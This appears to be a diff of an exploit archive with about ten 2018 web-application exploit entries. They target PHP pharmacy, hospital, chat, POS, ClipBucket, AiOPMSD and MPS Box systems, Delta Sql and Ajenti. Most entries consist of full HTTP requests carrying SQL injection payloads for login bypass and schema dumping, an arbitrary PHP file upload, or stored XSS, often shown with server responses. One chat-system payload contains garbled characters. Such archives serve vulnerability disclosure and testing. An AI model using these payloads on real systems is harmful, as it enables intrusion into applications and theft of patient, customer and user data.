# Exploit Author: Boumediene KADDOUR
# Unit: Algerie Telecom R&D Unit
# Vendor Homepage: https://www.phptpoint.com/
# Software Link: https://www.phptpoint.com/pharmacy-management-system/
# Version: 1
# Tested on: WAMP windows 10 x64
# CVE: unknown
# Description: phptpoint Pharmacy Management System SQL injection suffers from a SQL injection
# vulnerability that allows an attacker to bypass the login page and authenticate
# as admin or any other user.
# Vulnerable Code:
4 $username=$_POST['username'];
5 $password=$_POST['password'];
6 $position=$_POST['position'];
7 switch($position){
8 case 'Admin':
9 $result=mysql_query("SELECT admin_id, username FROM admin WHERE username='$username' AND password='$password'");
10 $row=mysql_fetch_array($result);
# Payload:
POST /Pharmacy/index.php HTTP/1.1
Host: 172.16.122.4
Content-Length: 80
Cache-Control: max-age=0
Origin: http://172.16.122.4
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://172.16.122.4/Pharmacy/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,fr;q=0.8,fr-FR;q=0.7
Cookie: PHPSESSID=2kn5jlcarggk5u3bl1crarrj85
Connection: close
username=admin%27+OR+1+--+&password=anyPassword&position=Admin&submit=Login

75
exploits/php/webapps/45683.txt Normal file
View file

@ -0,0 +1,75 @@
# Exploit Title: phptpoint Hospital Management System 1.0 - 'user' SQL injection
# Date: 2018-10-24
# Exploit Author: Boumediene KADDOUR
# Unit: Algerie Telecom R&D Unit
# Vendor Homepage: https://www.phptpoint.com/
# Software Link:
# Version: 1
# Tested on: WAMP windows 10 x64
# CVE: unknown
# Description:
# Phptpoint hospital management system suffers from multiple SQL injection vulnerabilities that
# allow an attacker to bypass the login page and authenticate with admin, and then easily
# get database information or execute arbitrary commands.
# LOGIN.php SQL injection
13 extract($_POST);
14 if(isset($signIn))
15 {
16 //echo $user,$pass;
17 //for Admin
18 $que=mysql_query("select user,pass from admin where user='$user' and pass='$pass'");
19 $row= mysql_num_rows($que);
20 echo "raw ".$row;
21 if($row)
22 {
23 $_SESSION['admin'] =$user;
24 echo "<script>window.location='alist.php'</script>";
# Payload:
POST /hospital/index.php HTTP/1.1
Host: 172.16.122.4
Content-Length: 38
Cache-Control: max-age=0
Origin: http://172.16.122.4
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://172.16.122.4/hospital/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,fr;q=0.8,fr-FR;q=0.7
Cookie: PHPSESSID=2kn5jlcarggk5u3bl1crarrj85
Connection: close
user=admin%40gmail.com'+OR+1--+&pass=anything&signIn=
# ALIST.php SQLi
33 $todel=$_GET['rno'];
34 mysql_query("update appt SET ashow='N' where ano='$todel' ;");
35 }
# DUNDEL.php SQLi
21 $rno=$_GET["rno"];
22 mysql_query("update doct set dshow='Y' where dno='$rno'");
23 echo "<tr><td align=center><font size=4 color=green>SuccessfullyRecords Recovered</font></td></tr>";
24 echo "<tr><td align=center><a href=dlist.php>Continue...</a></td></tr>";
# PDEL.php SQLi
25 $todel=$_GET['rno'];
26 mysql_query("update Patient SET pshow='N' where pno='$todel' ;");
# PUNDEL.php SQLi
20 $rno=$_GET["rno"];
21
22
23 mysql_query("update Patient set pshow='Y' where pno='$rno'");
24 echo "<tr><td align=center><font size=4 color=green>SuccessfullyRecords Recovered</font></td></tr>";
25 echo "<tr><td align=center><a href=plist.php>Continue...</a></td></tr>";

41
exploits/php/webapps/45684.txt Normal file
View file

@ -0,0 +1,41 @@
# Exploit Title: Simple Chat System 1.0 - 'id' SQL Injection
# Dork: N/A
# Date: 2018-10-24
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/php/11610/simple-chat-system.html
# Software Link: https://sourceforge.net/projects/simple-chat-system/files/latest/download
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/user/chatroom.php?id=[SQL]
#
# [PATH]/user/chatroom.php
# 03 <?php
# 04 $id=$_REQUEST['id'];
# 05
# 06 $chatq=mysqli_query($conn,"select * from chatroom where chatroomid='$id'");
# 07 $chatrow=mysqli_fetch_array($chatq);
GET /[PATH]/user/chatroom.php?id=-3%27雷<E99BB7>穑ɏ볯纵듧纹럫庞%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e--+ HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml왩,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=fuobifeugni2gnt2kir6patce6
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 24 Oct 2018 20:44:14 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

71
exploits/php/webapps/45685.txt Normal file
View file

@ -0,0 +1,71 @@
# Exploit Title: Delta Sql 1.8.2 - Arbitrary File Upload
# Dork: N/A
# Date: 2018-10-25
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://deltasql.sourceforge.net/
# Software Link: https://sourceforge.net/projects/deltasql/files/latest/download
# Software Link: http://deltasql.sourceforge.net/deltasql/
# Version: 1.8.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/docs_manage.php?id=1
#
# http://localhost/[PATH]/upload/[FILE]
POST /[PATH]/docs_upload.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/[PATH]/docs_manage.php?id=1
Cookie: PHPSESSID=ra5c0bgati64a01fag01l8hhf0
Connection: keep-alive
Content-Type: multipart/form-data; boundary=
---------------------------158943328914318561992147220435
Content-Length: 721
-----------------------------158943328914318561992147220435
Content-Disposition: form-data; name="fileToUpload"; filename="Efe.php"
Content-Type: application/force-download
<?php
phpinfo();
?>
-----------------------------158943328914318561992147220435
Content-Disposition: form-data; name="submit"
Upload File
-----------------------------158943328914318561992147220435
Content-Disposition: form-data; name="id"
1
-----------------------------158943328914318561992147220435
Content-Disposition: form-data; name="version"
-----------------------------158943328914318561992147220435
Content-Disposition: form-data; name="hasdocs"
-----------------------------158943328914318561992147220435--
HTTP/1.1 200 OK
Date: Thu, 24 Oct 2018 00:24:27 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 1783
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<html>
<body>
<form action="http://localhost/[PATH]/docs_upload.php" method="post" enctype="multipart/form-data">
Select document to upload:
<input name="fileToUpload" id="fileToUpload" type="file">
<input value="Ver Ayari" name="submit" type="submit">
<input value="1" name="id" type="hidden">
<input value="1'" name="version" type="hidden">
<input value="1" name="hasdocs" type="hidden">
</form>
</body>
</html>

36
exploits/php/webapps/45686.txt Normal file
View file

@ -0,0 +1,36 @@
# Exploit Title: User Management 1.1 - Cross-Site Scripting
# Date: 2018-10-16
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: http://ardawan.com/
# Software Link : http://um.ardawan.com
# Software : User Management
# Version : 1.1
# Vulernability Type : Cross-site Scripting
# Vulenrability : Stored XSS
# CVE : CVE-2018-18419
# Stored XSS has been discovered in the upload section of ARDAWAN.COM User Management 1.1,
# as demonstrated by a .jpg filename to the /account URI.
# HTTP POST Request :
POST /Cpanel/account HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://TARGET/Cpanel/account
Content-Type: multipart/form-data; boundary=---------------------------7088451293981732581393631504
Content-Length: 1574638
Cookie: ci_session=cmq2fvkbgc133i8amc4sadmpl216iplt; UM_sessID=ovno91tjrd0qo8dc5d2il0teronrn9k1; _ga=GA1.2.1869398047.1539664507; _gid=GA1.2.268810780.1539664507
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------7088451293981732581393631504
Content-Disposition: form-data; name="fullName"
Admin
-----------------------------7088451293981732581393631504
Content-Disposition: form-data; name="profileImage"; filename="\"><img src=x onerror=alert(\"ismailtasdelen\")>.jpg"
Content-Type: image/jpeg

37
exploits/php/webapps/45688.txt Normal file
View file

@ -0,0 +1,37 @@
# Exploit Title: ClipBucket 2.8 - 'id' SQL Injection
# Dork: N/A
# Date: 2018-10-25
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://clipbucket.com/
# Software Link: https://sourceforge.net/projects/clipbucket/files/latest/download
# Version: 2.8.v3354
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/ajax.php
POST /[PATH]/ajax.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=fuobifeugni2gnt2kir6patce6
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 96
mode=rating&id=(CASE%20WHEN%20(112=112)%20THEN%20SLEEP(5)%20ELSE%20112%20END)&rating=5&type=user
HTTP/1.1 200 OK
Date: Wed, 24 Oct 2018 20:22:48 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 828
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

91
exploits/php/webapps/45689.txt Normal file
View file

@ -0,0 +1,91 @@
# Exploit Title: Simple POS and Inventory 1.0 - 'cat' SQL Injection
# Dork: N/A
# Date: 2018-10-24
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/php/11625/simple-pos-and-inventory-system.html
# Software Link: https://sourceforge.net/projects/simple-pos-and-inventory/files/latest/download
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/user/plist.php?cat=[SQL]
#
# [PATH]/user/plist.php
#
# 03 <?php $cat=$_GET['cat']; ?>
# 04 <body>
# 05 <?php include('navbar.php'); ?>
# 06 <div class="container">
# 07 <?php include('cart_search_field.php'); ?>
# 08 <div style="height: 80px;"></div>
# 09 <div>
# 10 <?php
# 11 $inc=4;
# 12 $query=mysqli_query($conn,"select * from product where categoryid='$cat'");
# 13 while($row=mysqli_fetch_array($query)){
# 14
# 15 $inc = ($inc == 4) ? 1 : $inc+1;
GET /[PATH]/user/plist.php?cat=-1%27++uniOn+seleCT+0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e--+- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=fuobifeugni2gnt2kir6patce6
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 24 Oct 2018 21:00:14 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/user/search_result.php?id=[SQL]
#
# [PATH]/usersearch_result.php
#
# 03 <?php $id=$_GET['id']; ?>
# 04 <body>
# 05 <?php include('navbar.php'); ?>
# 06 <div class="container">
# 07 <?php include('cart_search_field.php'); ?>
# 08 <div style="height: 80px;"></div>
# 09 <div>
# 10 <?php
# 11 $inc=4;
# 12 $query=mysqli_query($conn,"select * from product where productid='$id'");
# 13 while($row=mysqli_fetch_array($query)){
# 14
# 15 $inc = ($inc == 4) ? 1 : $inc+1;
GET /[PATH]/user/search_result.php?id=-1%27++uniOn+seleCT+0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e--+- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=fuobifeugni2gnt2kir6patce6
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 24 Oct 2018 21:05:31 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

170
exploits/php/webapps/45690.txt Normal file
View file

@ -0,0 +1,170 @@
# Exploit Title: AiOPMSD Final 1.0.0 - 'q' SQL Injection
# Dork: N/A
# Date: 2018-10-24
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://aiopmsd.sourceforge.io/
# Software Link: https://sourceforge.net/projects/aiopmsd/files/latest/download
# Version: 1.0.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/search.php?q=[SQL]
GET /[PATH]/search.php?q=12%27||(SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||%27 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 24 Oct 2018 22:28:21 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 172
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/actor.php?actor=[SQL]
GET /[PATH]/actor.php?actor=12%27||(SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||%27 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 24 Oct 2018 22:32:41 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 172
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 3)
# http://localhost/[PATH]/director.php?director=[SQL]
#
GET /[PATH]/director.php?director=12%27||(SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||%27 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 24 Oct 2018 22:34:10 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 172
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 4)
# http://localhost/[PATH]/country.php?country=[SQL]
GET /[PATH]/country.php?country=12%27||(SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||%27 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 24 Oct 2018 22:35:48 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 172
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 5)
# http://localhost/[PATH]/quality.php?quality=[SQL]
GET /[PATH]/quality.php?quality=12%27||(SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||%27 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 24 Oct 2018 22:37:11 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 172
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 6)
# http://localhost/[PATH]/year.php?year=[SQL]
GET /[PATH]/year.php?year=12%27||(SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||%27 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 24 Oct 2018 22:38:38 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 172
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 7)
# http://localhost/[PATH]/genre.php?genre=[SQL]
GET /[PATH]/genre.php?genre=12%27||(SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||%27 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 24 Oct 2018 22:39:48 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 172
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 8)
# http://localhost/[PATH]/watch.php?id=[SQL]
GET /[PATH]/watch.php?id=12%27||(SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||%27 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 24 Oct 2018 22:41:11 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 172
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

21
exploits/php/webapps/45691.txt Normal file
View file

@ -0,0 +1,21 @@
# Title: AjentiCP 1.2.23.13 - Cross-Site Scripting
# Author: Numan OZDEMIR (https://infinitumit.com.tr)
# Vendor Homepage: ajenti.org
# Software Link: https://github.com/ajenti/ajenti
# Version: Up to v1.2.23.13
# CVE: CVE-2018-18548
# Description:
# Attacker can inject JavaScript codes without Ajenti privileges by this
# vulnerabillity.
# Normally an attacker cant intervene to Ajenti without Ajenti privileges.
# But with this vulnerability, if attacker can create a folder (may be by
# a web app vulnerability) he can run
# bad-purposed JavaScript codes on Ajenti user's browser, while the user
# using File Manager tool.
# So this vulnerability makes high risk.
# How to Reproduce:
1)- Create a directory as named xss payload. Like, im<img src onerror=alert(1337)>dir
2)- Open this directory in File Manager tool in Ajenti server admin panel.

47
exploits/php/webapps/45692.txt Normal file
View file

@ -0,0 +1,47 @@
# Exploit Title: MPS Box 0.1.8.0 - 'uuid' SQL Injection
# Dork: N/A
# Date: 2018-10-25
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.mpsbox.com/
# Software Link: https://sourceforge.net/projects/mpsbox/files/latest/download
# Version: 0.1.8.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/inc/popup.qrcode.inc.php?uuid=[SQL]
# [PATH]/inc/popup.qrcode.inc.php
#
# 24 include_once("dbfunctions.inc.php");
# 25
# 26 $uuid = $_GET["uuid"];
# 27
# 28 $db = pdo_connect();
# 29
# 30 $dev_data_sql = $db->query("SELECT ref_name,ip_add,model_name,serial_num FROM USR_DEVICES where uuid IN ($uuid)");
# 31 $row_count = $dev_data_sql->rowCount();
# 32
# 33 ?>
GET /[PATH]/inc/popup.qrcode.inc.php?uuid=1)+UniON+sELect+0x496873616e2053656e63616e%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e--+- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Thu, 25 Oct 2018 13:19:47 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: PHPSESSID=8m9cbclampf4u5n4ketdi2q997; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

55
